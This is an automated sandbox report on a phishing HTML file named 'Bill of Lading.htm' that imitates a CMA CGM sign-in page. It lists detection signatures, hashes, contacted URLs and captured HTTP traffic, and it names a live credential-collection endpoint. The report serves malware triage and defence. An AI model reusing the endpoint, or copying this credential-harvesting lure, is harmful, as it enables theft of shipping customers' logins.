Windows Analysis Report
Bill of Lading.htm

Overview

General Information

Sample Name: Bill of Lading.htm
Analysis ID: 656080
MD5: a6326708064aa448a2f9d842ed8af555
SHA1: 246d098d0a455ed4eba2a96f3c7489685f013345
SHA256: 4c326163765ccce65ac5fe6c707b286f9f7fdffc49d20d68a61df80f7dc72a35
Infos:

Detection

HTMLPhisher
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected HtmlPhish10
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
HTML document with suspicious title
Drops PE files
Found iframes
None HTTPS page querying sensitive user data (password, username or email)
PE file contains sections with non-standard names
No HTML title found
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: Bill of Lading.htm Avira: detected
Multi AV Scanner detection for submitted file
Source: Bill of Lading.htm Virustotal: Detection: 37% Perma Link
Antivirus detection for URL or domain
Source: https://dorothearenault.com/blog/wp-includes/blocks/audio/reportcmacgm.php Avira URL Cloud: Label: phishing

Phishing
barindex
Yara detected HtmlPhish10
Source: Yara match File source: Bill of Lading.htm, type: SAMPLE
Source: Yara match File source: 64316.1.pages.csv, type: HTML
Found iframes
Source: file:///C:/Users/user/Desktop/Bill%20of%20Lading.htm HTTP Parser: Iframe src: https://www.cma-cgm.com/Images/signin-cmacgm.jpg
Source: file:///C:/Users/user/Desktop/Bill%20of%20Lading.htm HTTP Parser: Iframe src: https://www.cma-cgm.com/Images/signin-cmacgm.jpg
None HTTPS page querying sensitive user data (password, username or email)
Source: file:///C:/Users/user/Desktop/Bill%20of%20Lading.htm HTTP Parser: Has password / email / username input fields
Source: file:///C:/Users/user/Desktop/Bill%20of%20Lading.htm HTTP Parser: Has password / email / username input fields
No HTML title found
Source: file:///C:/Users/user/Desktop/Bill%20of%20Lading.htm HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/Bill%20of%20Lading.htm HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/Bill%20of%20Lading.htm HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Bill%20of%20Lading.htm HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Bill%20of%20Lading.htm HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Bill%20of%20Lading.htm HTTP Parser: No <meta name="copyright".. found
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Local\Temp\4952_1306222165\LICENSE.txt Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic Jump to behavior
Source: unknown HTTPS traffic detected: 152.199.21.98:443 -> 192.168.2.3:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 193.109.119.57:443 -> 192.168.2.3:49764 version: TLS 1.2
Source: Binary string: widevinecdm.dll.pdb source: widevinecdm.dll.0.dr
Source: Binary string: widevinecdm.dll.pdb@ source: widevinecdm.dll.0.dr
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 13.224.103.115 13.224.103.115
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: Ruleset Data.0.dr String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: Filtering Rules.0.dr, Ruleset Data.0.dr String found in binary or memory: www.facebook.com/ajax/ads/ equals www.facebook.com (Facebook)
Source: Filtering Rules.0.dr String found in binary or memory: www.facebook.com0 equals www.facebook.com (Facebook)
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenAccept-CH: Sec-CH-UA,Sec-CH-UA-Mobile,Sec-CH-UA-Platform,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-Device-MemoryAccept-CH: Sec-CH-UA,Sec-CH-UA-Mobile,Sec-CH-UA-Platform,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-Device-MemoryCache-Control: max-age=0, private, no-cache, no-store, must-revalidateCharset: utf-8Content-Type: text/html;charset=utf-8Date: Sat, 02 Jul 2022 22:04:41 GMTPragma: no-cacheServer: DataDomeSet-Cookie: datadome=FEY5tb7dPG5UbSTpt-_t5HLx-spNa8mUmaxj2mfn.DuL7~dry7ouR9vL3Qevdgn7Eqn1lLrTo6tnHTMgPmiQp.r~~fotEl~qeRY-4E2C_EyMSxKpTGl7A7t0yO_P1n1; Max-Age=31536000; Domain=.cma-cgm.com; Path=/; Secure; SameSite=LaxX-DataDome: protectedX-DataDome-botfamily: bad_botX-DataDome-botname: Recent proxies suspicious server-side fingerprintX-DataDome-captchapassed: 0X-DataDome-Charset: utf-8X-DataDome-CID: AHrlqAAAAAMArtYQMyDW4e8AVBE0Ug==X-DataDome-headers: X-DataDome Accept-CH Content-Type Charset Cache-Control Pragma Accept-CH X-DataDome-CID Set-CookieX-DataDome-isbot: 1X-DataDome-request-headers: X-DataDome-botname X-DataDome-botfamily X-DataDome-isbot X-DataDome-captchapassed X-DataDome-ruletype X-DataDome-requestidX-DataDome-requestid: dd3257bd-6ce4-921b-fe05-d2086b174fb3X-DataDome-ruletype: AI Threats DetectionX-DataDomeResponse: 403Content-Length: 531Connection: close
Source: widevinecdm.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: widevinecdm.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: widevinecdm.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: widevinecdm.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: widevinecdm.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: widevinecdm.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: widevinecdm.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: widevinecdm.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: widevinecdm.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: widevinecdm.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: widevinecdm.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: pnacl_public_x86_64_pnacl_sz_nexe.0.dr, pnacl_public_x86_64_pnacl_llc_nexe.0.dr String found in binary or memory: http://llvm.org/):
Source: widevinecdm.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: widevinecdm.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: widevinecdm.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: widevinecdm.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: widevinecdm.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: 2ded6b72-3f6d-4366-9d76-06a94d6df90e.tmp.1.dr, 35e22058-b623-43ef-9d5a-2cf245c30840.tmp.1.dr String found in binary or memory: https://accounts.google.com
Source: craw_window.js.0.dr String found in binary or memory: https://accounts.google.com/MergeSession
Source: 2ded6b72-3f6d-4366-9d76-06a94d6df90e.tmp.1.dr, 35e22058-b623-43ef-9d5a-2cf245c30840.tmp.1.dr String found in binary or memory: https://apis.google.com
Source: Bill of Lading.htm String found in binary or memory: https://auth-dev.cma-cgm.com:9031/assets/fonts/icons/mustIcons/musticons.woff
Source: Bill of Lading.htm String found in binary or memory: https://auth.cma-cgm.com/TSbd/08337f9cc5ab200098c9bf786f804c6cd4f8d35ad295482c9b58fcd74625ba236252d0
Source: Bill of Lading.htm String found in binary or memory: https://auth.cma-cgm.com/assets/images/ecom/favico/cmacgm.png
Source: Bill of Lading.htm String found in binary or memory: https://auth.cma-cgm.com/ext/pwdreset/Identify?referrer=https%3A%2F%2Fauth.cma-cgm.com%2Fidp%2F4PMLF
Source: pnacl_public_x86_64_libpnacl_irt_shim_dummy_a.0.dr String found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-clang.git
Source: pnacl_public_x86_64_libpnacl_irt_shim_dummy_a.0.dr String found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-llvm.git
Source: 2ded6b72-3f6d-4366-9d76-06a94d6df90e.tmp.1.dr, 35e22058-b623-43ef-9d5a-2cf245c30840.tmp.1.dr String found in binary or memory: https://clients2.google.com
Source: manifest.json1.0.dr, manifest.json.0.dr, manifest.json2.0.dr String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 2ded6b72-3f6d-4366-9d76-06a94d6df90e.tmp.1.dr, 35e22058-b623-43ef-9d5a-2cf245c30840.tmp.1.dr String found in binary or memory: https://clients2.googleusercontent.com
Source: pnacl_public_x86_64_ld_nexe.0.dr String found in binary or memory: https://code.google.com/p/nativeclient/issues/entry
Source: pnacl_public_x86_64_ld_nexe.0.dr String found in binary or memory: https://code.google.com/p/nativeclient/issues/entry%s:
Source: 35e22058-b623-43ef-9d5a-2cf245c30840.tmp.1.dr String found in binary or memory: https://content-autofill.googleapis.com
Source: LICENSE.txt.0.dr String found in binary or memory: https://creativecommons.org/.
Source: LICENSE.txt.0.dr String found in binary or memory: https://creativecommons.org/compatiblelicenses
Source: 2ded6b72-3f6d-4366-9d76-06a94d6df90e.tmp.1.dr, ba9fdaff-75ad-40b0-b8fd-e387f5b7b1de.tmp.1.dr, cae02159-572b-45a6-9a0e-fabb434c4db1.tmp.1.dr, 35e22058-b623-43ef-9d5a-2cf245c30840.tmp.1.dr String found in binary or memory: https://dns.google
Source: Bill of Lading.htm String found in binary or memory: https://dorothearenault.com/blog/wp-includes/blocks/audio/reportcmacgm.php
Source: LICENSE.txt.0.dr String found in binary or memory: https://easylist.to/)
Source: 2ded6b72-3f6d-4366-9d76-06a94d6df90e.tmp.1.dr String found in binary or memory: https://fonts.googleapis.com
Source: 2ded6b72-3f6d-4366-9d76-06a94d6df90e.tmp.1.dr, 35e22058-b623-43ef-9d5a-2cf245c30840.tmp.1.dr String found in binary or memory: https://fonts.gstatic.com
Source: LICENSE.txt.0.dr String found in binary or memory: https://github.com/easylist)
Source: craw_window.js.0.dr, craw_background.js.0.dr String found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
Source: 2ded6b72-3f6d-4366-9d76-06a94d6df90e.tmp.1.dr, 35e22058-b623-43ef-9d5a-2cf245c30840.tmp.1.dr String found in binary or memory: https://ogs.google.com
Source: craw_window.js.0.dr, manifest.json.0.dr String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 2ded6b72-3f6d-4366-9d76-06a94d6df90e.tmp.1.dr, 35e22058-b623-43ef-9d5a-2cf245c30840.tmp.1.dr String found in binary or memory: https://play.google.com
Source: 35e22058-b623-43ef-9d5a-2cf245c30840.tmp.1.dr String found in binary or memory: https://r5---sn-4g5ednde.gvt1.com
Source: 35e22058-b623-43ef-9d5a-2cf245c30840.tmp.1.dr String found in binary or memory: https://redirector.gvt1.com
Source: craw_window.js.0.dr, manifest.json.0.dr String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: 2ded6b72-3f6d-4366-9d76-06a94d6df90e.tmp.1.dr, 35e22058-b623-43ef-9d5a-2cf245c30840.tmp.1.dr String found in binary or memory: https://ssl.gstatic.com
Source: craw_window.js.0.dr, craw_background.js.0.dr String found in binary or memory: https://www-googleapis-staging.sandbox.google.com
Source: Bill of Lading.htm String found in binary or memory: https://www.cma-cgm.com
Source: Bill of Lading.htm String found in binary or memory: https://www.cma-cgm.com/Images/signin-cmacgm.jpg
Source: Bill of Lading.htm String found in binary or memory: https://www.cma-cgm.com/legal-terms
Source: widevinecdm.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 2ded6b72-3f6d-4366-9d76-06a94d6df90e.tmp.1.dr, 35e22058-b623-43ef-9d5a-2cf245c30840.tmp.1.dr String found in binary or memory: https://www.google.com
Source: manifest.json.0.dr String found in binary or memory: https://www.google.com/
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/accounts/OAuthLogin?issueuberauth=1
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/images/cleardot.gif
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/images/dot2.gif
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/images/x2.gif
Source: craw_background.js.0.dr String found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
Source: 2ded6b72-3f6d-4366-9d76-06a94d6df90e.tmp.1.dr, craw_window.js.0.dr, craw_background.js.0.dr, 35e22058-b623-43ef-9d5a-2cf245c30840.tmp.1.dr String found in binary or memory: https://www.googleapis.com
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: 2ded6b72-3f6d-4366-9d76-06a94d6df90e.tmp.1.dr, 35e22058-b623-43ef-9d5a-2cf245c30840.tmp.1.dr String found in binary or memory: https://www.gstatic.com
Source: unknown HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: unknown DNS traffic detected: queries for: accounts.google.com
Source: global traffic HTTP traffic detected: GET /TSbd/08337f9cc5ab200098c9bf786f804c6cd4f8d35ad295482c9b58fcd74625ba236252d06005b7c679?type=2 HTTP/1.1Host: auth.cma-cgm.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfmX-Goog-Update-Updater: chromecrx-85.0.4183.121Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /Images/signin-cmacgm.jpg HTTP/1.1Host: www.cma-cgm.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /assets/images/ecom/favico/cmacgm.png HTTP/1.1Host: auth.cma-cgm.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /Images/signin-cmacgm.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: www.cma-cgm.com
Source: global traffic HTTP traffic detected: GET /assets/images/ecom/favico/cmacgm.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: auth.cma-cgm.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: www.cma-cgm.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /c.js HTTP/1.1Host: ct.captcha-delivery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cma-cgm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /captcha/?initialCid=AHrlqAAAAAMArtYQMyDW4e8AVBE0Ug%3D%3D&hash=490A8A2485BA28921F861A802754DD&cid=FEY5tb7dPG5UbSTpt-_t5HLx-spNa8mUmaxj2mfn.DuL7~dry7ouR9vL3Qevdgn7Eqn1lLrTo6tnHTMgPmiQp.r~~fotEl~qeRY-4E2C_EyMSxKpTGl7A7t0yO_P1n1&t=fe&referer=https%3A%2F%2Fwww.cma-cgm.com%2F&s=39232&e=780f21e70762d08ade6338357e438d98c48990f440d7390dde3eecf1a92ad3d5 HTTP/1.1Host: geo.captcha-delivery.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.cma-cgm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /captcha/assets/tpl/6dc485c0c428c35b53577b146dc6f9179f55ef9ad41b327a2a179998839364bf/index.css HTTP/1.1Host: static.captcha-delivery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://geo.captcha-delivery.com/captcha/?initialCid=AHrlqAAAAAMArtYQMyDW4e8AVBE0Ug%3D%3D&hash=490A8A2485BA28921F861A802754DD&cid=FEY5tb7dPG5UbSTpt-_t5HLx-spNa8mUmaxj2mfn.DuL7~dry7ouR9vL3Qevdgn7Eqn1lLrTo6tnHTMgPmiQp.r~~fotEl~qeRY-4E2C_EyMSxKpTGl7A7t0yO_P1n1&t=fe&referer=https%3A%2F%2Fwww.cma-cgm.com%2F&s=39232&e=780f21e70762d08ade6338357e438d98c48990f440d7390dde3eecf1a92ad3d5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /common/fonts/roboto/font-face.css HTTP/1.1Host: static.captcha-delivery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://geo.captcha-delivery.com/captcha/?initialCid=AHrlqAAAAAMArtYQMyDW4e8AVBE0Ug%3D%3D&hash=490A8A2485BA28921F861A802754DD&cid=FEY5tb7dPG5UbSTpt-_t5HLx-spNa8mUmaxj2mfn.DuL7~dry7ouR9vL3Qevdgn7Eqn1lLrTo6tnHTMgPmiQp.r~~fotEl~qeRY-4E2C_EyMSxKpTGl7A7t0yO_P1n1&t=fe&referer=https%3A%2F%2Fwww.cma-cgm.com%2F&s=39232&e=780f21e70762d08ade6338357e438d98c48990f440d7390dde3eecf1a92ad3d5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /captcha/assets/set/45d788cda3c3698f9b00f48b6b6f6dfb843702dd/logo.png?update_cache=-8246815016896654048 HTTP/1.1Host: static.captcha-delivery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://geo.captcha-delivery.com/captcha/?initialCid=AHrlqAAAAAMArtYQMyDW4e8AVBE0Ug%3D%3D&hash=490A8A2485BA28921F861A802754DD&cid=FEY5tb7dPG5UbSTpt-_t5HLx-spNa8mUmaxj2mfn.DuL7~dry7ouR9vL3Qevdgn7Eqn1lLrTo6tnHTMgPmiQp.r~~fotEl~qeRY-4E2C_EyMSxKpTGl7A7t0yO_P1n1&t=fe&referer=https%3A%2F%2Fwww.cma-cgm.com%2F&s=39232&e=780f21e70762d08ade6338357e438d98c48990f440d7390dde3eecf1a92ad3d5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /captcha/assets/tpl/6dc485c0c428c35b53577b146dc6f9179f55ef9ad41b327a2a179998839364bf/loading_spinner.gif HTTP/1.1Host: static.captcha-delivery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://geo.captcha-delivery.com/captcha/?initialCid=AHrlqAAAAAMArtYQMyDW4e8AVBE0Ug%3D%3D&hash=490A8A2485BA28921F861A802754DD&cid=FEY5tb7dPG5UbSTpt-_t5HLx-spNa8mUmaxj2mfn.DuL7~dry7ouR9vL3Qevdgn7Eqn1lLrTo6tnHTMgPmiQp.r~~fotEl~qeRY-4E2C_EyMSxKpTGl7A7t0yO_P1n1&t=fe&referer=https%3A%2F%2Fwww.cma-cgm.com%2F&s=39232&e=780f21e70762d08ade6338357e438d98c48990f440d7390dde3eecf1a92ad3d5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /tags.js HTTP/1.1Host: js.datadome.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://geo.captcha-delivery.com/captcha/?initialCid=AHrlqAAAAAMArtYQMyDW4e8AVBE0Ug%3D%3D&hash=490A8A2485BA28921F861A802754DD&cid=FEY5tb7dPG5UbSTpt-_t5HLx-spNa8mUmaxj2mfn.DuL7~dry7ouR9vL3Qevdgn7Eqn1lLrTo6tnHTMgPmiQp.r~~fotEl~qeRY-4E2C_EyMSxKpTGl7A7t0yO_P1n1&t=fe&referer=https%3A%2F%2Fwww.cma-cgm.com%2F&s=39232&e=780f21e70762d08ade6338357e438d98c48990f440d7390dde3eecf1a92ad3d5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /common/fonts/roboto/roboto.woff2 HTTP/1.1Host: static.captcha-delivery.comConnection: keep-aliveOrigin: https://geo.captcha-delivery.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://static.captcha-delivery.com/common/fonts/roboto/font-face.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
